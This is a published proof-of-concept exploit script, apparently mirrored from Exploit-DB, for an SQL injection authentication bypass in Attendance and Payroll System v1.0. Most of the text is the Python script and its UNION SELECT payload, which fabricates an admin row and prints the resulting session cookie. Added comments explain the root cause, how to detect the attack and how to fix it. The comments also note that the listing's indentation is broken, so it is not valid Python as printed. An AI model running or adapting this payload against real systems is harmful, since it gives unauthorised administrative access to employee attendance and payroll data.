Attendance and Payroll System v1.0 – SQLi Authentication Bypass

  • 作者: pr0z
    日期: 2022-03-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50802/
  • # Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
    # Date: 04/03/2022
    # Exploit Author: pr0z
    # Vendor Homepage: https://www.sourcecodester.com
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
    # Version: v1.0
    # Tested on: Linux, MySQL, Apache
    
    import requests
    import sys
    from requests.exceptions import ConnectionError
    
    
    # Banner. Everything below is the published proof-of-concept referenced in
    # the header; the comments added here explain the vulnerable pattern from a
    # defender's point of view (root cause, detection, mitigation).
    print('\n>> Attendance and Payroll System v1.0')
    print('>> Authentication Bypass through SQL injection')
    print('>> By pr0z\n')
    
    # Application paths, appended to the base URL given as the first CLI argument.
    login_path = '/apsystem/admin/login.php'
    index_path = '/apsystem/admin/index.php'
    
    # Form body sent to login.php. The username value closes the string literal
    # of the login query and appends a UNION SELECT that returns one fabricated
    # account row (id, username, password, firstname, lastname, photo,
    # created_on); the trailing "-- " comments out the rest of the query.
    # The password column carries a "$2y$10$..." string, i.e. a PHP
    # password_hash()-style bcrypt value, so a server-side password_verify()
    # (assumed — login.php is not shown here) compares the POSTed password
    # against attacker-supplied data rather than against the stored admin hash.
    # Root cause: the POSTed username is interpolated into the SQL string.
    # Mitigation: prepared statements with bound parameters; never build the
    # WHERE clause from request data. Detection: a username field containing
    # "' UNION SELECT" in web-server or query logs has no legitimate use and is
    # a high-confidence signature for this class of attempt.
    payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    
    
    # Check for arguments
    # A base URL (scheme + host) is required; "-h" anywhere in argv prints usage.
    # NOTE: the bodies of this `if` and of the try/except below lost their
    # indentation when the listing was rendered, so the text as printed is not
    # syntactically valid Python.
    if len(sys.argv) < 2 or '-h' in sys.argv:
    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
    sys.exit()
    
    # Bypass Authentication
    target = sys.argv[1]
    print("[+] Extracting Administrator cookie using SQLi ...")
    # A Session retains the PHPSESSID cookie set by the first GET; the POST then
    # reuses that session id, which the server presumably associates with the
    # fabricated account on a successful login.
    sess = requests.Session()
    try:
    # verify=False disables TLS certificate validation for both requests, so a
    # man-in-the-middle between this host and the target would go unnoticed.
    sess.get(target + index_path,headers=headers, verify=False)
    sess.post(target + login_path, data=payload, headers=headers,verify=False)
    except ConnectionError:
    print('[-] We were unable to establish a connection')
    sys.exit()
    
    # Only a missing connection is handled; HTTP status and the login response
    # body are never inspected, and cookie_val is None when the target set no
    # PHPSESSID cookie at all. The output is therefore printed regardless of
    # whether the bypass actually succeeded.
    cookie_val = sess.cookies.get_dict().get("PHPSESSID")
    
    print("[+] Use the following cookie:\n")
    print(f"PHPSESSID: {cookie_val}")